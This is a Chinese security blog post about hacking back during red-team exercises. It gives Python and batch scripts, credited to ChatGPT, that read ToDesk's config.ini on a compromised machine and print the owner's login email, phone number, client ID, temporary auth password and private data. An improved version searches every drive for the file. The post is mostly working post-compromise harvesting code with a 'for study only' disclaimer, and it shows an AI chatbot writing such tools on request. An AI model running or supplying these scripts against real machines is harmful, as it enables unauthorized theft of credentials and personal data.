来源:https://www.iculture.cc/knowledge/pig=32636
之前分享的《获取ToDesk登录邮箱和手机号》文中列举了几个场景,最近看到@猪猪侠师傅写的这篇文章还挺有意思,分享给大家一起学习下(举一反三)!
前言
在攻防演练中,通常会出现溯源反制的场景,我们这里假设已经连上了黑客的服务器,并且发现黑客的电脑中使用 了ToDesk的远程桌面软件,如果你自己的电脑中也安装了ToDesk,可以看到在ToDesk目录下会有一个config.ini文件
downloadtimes 下载Todesk的时间
updatePassTime 最近一次使用时间
Version Todesk版本号
clientid 客户端ID
LoginPhone 手机号
LoginEmail 邮箱账户
使用ChatGPT编写自动化脚本
Python脚本
然后看看ChatGPT的杰作吧
ToDesk.py代码如下:
# -*- coding: utf-8 -*-
import configparser
config_file = "C:/Program Files/ToDesk/config.ini"
config = configparser.ConfigParser()
config.read(config_file)
# 提取需要的配置项
download_times = config.get("ConfigInfo", "downloadtimes")
version = config.get("ConfigInfo", "Version")
client_id = config.get("ConfigInfo", "clientId")
temp_auth_pass_ex = config.get("ConfigInfo", "tempAuthPassEx")
resolution = config.get("ConfigInfo", "Resolution")
update_pass_time = config.get("ConfigInfo", "updatePassTime")
private_data = config.get("ConfigInfo", "PrivateData")
login_phone = config.get("ConfigInfo", "LoginPhone")
login_email = config.get("ConfigInfo", "LoginEmail")
# 输出结果
print("*********** Todesk溯源小助手 ***********")
print(f"电子邮件账户:{login_email}")
print(f"手机号:{login_phone}")
print(f"下载时间:{download_times}")
print(f"最近一次使用ToDesk时间:{update_pass_time}")
print(f"当前屏幕尺寸:{resolution}")
print(f"Todesk版本号:{version}")
print(f"客户端ID:{client_id}")
print(f"私密数据:{private_data}")
print(f"临时认证密钥:{temp_auth_pass_ex}")
print("*********** 公众号:猪猪安全 ***********")
运行效果如下
Todesk.bat代码如下:
@echo off
set "config_file=C:\Program Files\ToDesk\config.ini"
for /f "tokens=1,2 delims==" %%a in ('findstr /i /c:"downloadtimes=" /c:"Version=" /c:"clientId=" /c:"tempAuthPassEx=" /c:"Resolution=" /c:"updatePassTime=" /c:"PrivateData=" /c:"LoginPhone=" /c:"LoginEmail=" "%config_file%"') do (
if "%%a" == "downloadtimes" set "download_times=%%b"
if "%%a" == "Version" set "version=%%b"
if "%%a" == "clientId" set "client_id=%%b"
if "%%a" == "tempAuthPassEx" set "temp_auth_pass_ex=%%b"
if "%%a" == "Resolution" set "resolution=%%b"
if "%%a" == "updatePassTime" set "update_pass_time=%%b"
if "%%a" == "PrivateData" set "private_data=%%b"
if "%%a" == "LoginPhone" set "login_phone=%%b"
if "%%a" == "LoginEmail" set "login_email=%%b"
)
echo *********** Todesk溯源小助手 ***********
echo 电子邮件账户:%login_email%
echo 手机号:%login_phone%
echo 下载时间:%download_times%
echo 最近一次使用ToDesk时间:%update_pass_time%
echo 当前屏幕尺寸:%resolution%
echo Todesk版本号:%version%
echo 客户端ID:%client_id%
echo 私密数据:%private_data%
echo 临时认证密钥:%temp_auth_pass_ex%
echo *********** 公众号:猪猪安全 ***********
pause
在cmd中运行或者直接打开都可以
优化代码
我们继续询问ChatGPT
# -*- coding: utf-8 -*-
import os
import configparser
target_filename = 'config.ini'
target_strings = ['ToDesk']
# 定义需要搜索的盘符
drive_letters = ['C', 'D', 'E', 'F', 'G']
for drive_letter in drive_letters:
drive_path = f"{drive_letter}:\\"
for dirpath, dirnames, filenames in os.walk(drive_path):
if target_filename in filenames and all(s in dirpath for s in target_strings):
config_path = os.path.join(dirpath, target_filename)
# 找到 config.ini 文件
print(f"找到配置文件:{config_path}")
# 使用 ConfigParser 解析配置文件
config = configparser.ConfigParser()
config.read(config_path)
# 提取相关信息
download_times = config.get('ConfigInfo', 'downloadtimes')
version = config.get('ConfigInfo', 'Version')
client_id = config.get('ConfigInfo', 'clientId')
temp_auth_pass = config.get('ConfigInfo', 'tempAuthPassEx')
resolution = config.get('ConfigInfo', 'Resolution')
update_pass_time = config.get('ConfigInfo', 'updatePassTime')
private_data = config.get('ConfigInfo', 'PrivateData')
login_phone = config.get('ConfigInfo', 'LoginPhone')
login_email = config.get('ConfigInfo', 'LoginEmail')
# 输出提取的信息
print("*********** Todesk溯源小助手 ***********")
print(f"电子邮件账户:{login_email}")
print(f"手机号:{login_phone}")
print(f"下载时间:{download_times}")
print(f"最近一次使用ToDesk时间:{update_pass_time}")
print(f"当前屏幕尺寸:{resolution}")
print(f"Todesk版本号:{version}")
print(f"客户端ID:{client_id}")
print(f"私密数据:{private_data}")
print(f"临时认证密钥:{temp_auth_pass}")
print("*********** 公众号:猪猪安全 ***********")
# 找到配置文件后退出搜索
quit()
@echo off
setlocal EnableDelayedExpansion
set SEARCH_DRIVE=C D E F G
set SEARCH_PATH=Program Files
set VERSION=
set CLIENT_ID=
set AUTH_PASS=
set RESOLUTION=
set UPDATE_TIME=
set PRIVATE_DATA=
set EMAIL=
set PHONE=
set DOWNLOAD_TIME=
set "INI_FILE=config.ini"
echo Searching for ToDesk configuration file...
for %%d in (%SEARCH_DRIVE%) do (
for /f "tokens=*" %%p in ('dir /s /b "%%d:\%SEARCH_PATH%" 2^>nul ^| findstr /i /c:"ToDesk"') do (
if exist "%%p\%INI_FILE%" (
echo Found ToDesk configuration file at: "%%p\%INI_FILE%"
set "CONFIG_FILE=%%p\%INI_FILE%"
for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"version="') do set "VERSION=%%j"
for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"clientId="') do set "CLIENT_ID=%%j"
for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"tempAuthPassEx="') do set "AUTH_PASS=%%j"
for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"Resolution="') do set "RESOLUTION=%%j"
for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"updatePassTime="') do set "UPDATE_TIME=%%j"
for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"PrivateData="') do set "PRIVATE_DATA=%%j"
for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"LoginEmail="') do set "EMAIL=%%j"
for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"LoginPhone="') do set "PHONE=%%j"
for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"downloadtimes="') do set "DOWNLOAD_TIME=%%j"
goto :info_found
)
)
)
echo ToDesk configuration file not found.
goto :end
:info_found
echo.
echo *********** Todesk溯源小助手 ***********
echo 电子邮件账户:%EMAIL%
echo 手机号:%PHONE%
echo 下载时间:%DOWNLOAD_TIME%
echo 最近一次使用ToDesk时间:%UPDATE_TIME%
echo 当前屏幕尺寸:%RESOLUTION%
echo Todesk版本号:%VERSION%
echo 客户端ID:%CLIENT_ID%
echo 私密数据:%PRIVATE_DATA%
echo 临时认证密钥:%AUTH_PASS%
echo *********** 公众号:猪猪安全 ***********
pause
文章来源:潇湘信安
仅用于学习交流,不得用于非法用途
如侵权请私聊公众号删文